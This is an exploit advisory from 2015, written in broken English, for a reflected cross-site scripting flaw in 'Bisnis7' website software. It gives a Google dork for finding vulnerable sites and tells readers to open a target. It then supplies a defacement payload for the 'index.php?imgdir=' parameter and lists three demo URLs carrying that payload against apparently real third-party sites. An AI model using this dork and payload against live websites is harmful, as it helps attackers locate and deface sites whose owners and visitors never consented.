######################################################## # Exploit Title: bisnis7/Cross Site Scripting(XSS) ######################################################## # Google Dork: inurl:"poto" intext:"powered by Bisnis7 " # You Can Make Another Dork For This Bug # Date: [15/11/2015] # Exploit Author: Guardiran Security Team =>DeMoN # Vendor Homepage: [http://bisnis7.com.webstatsdomain.org/] # Software Link: [-] # Version: All Version # Tested on: [Win 8.1/Google chrome] # CVE : [-] ######################################################## # DISCRIPTION: Hello Guys. # That sites Have XSS Or Cross Site Scripting Bug. # Please Enter Dork In Google And Open Your Target. # Then add This Script # ["><marquee><h1>Hacked_By_DeMoN_guardiran.org</h1></marquee>] # In Target after Yhis Section # [index.php?imgdir=] # Then You See That Your Script Accomplished. # GooD LucK ######################################################## # Demo: # http://www.rumahguidXes.com/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E # http://www.geestringXs.net/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E # http://dumbwaiterinXdonesia.com/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E ######################################################## # Thanks to : C0d3!Nj3ct!0N | REX | abarestan | GrYpHoN | BLACKH4T # We Are Guardiran Security Team # Discovered By:DeMoN ########################################################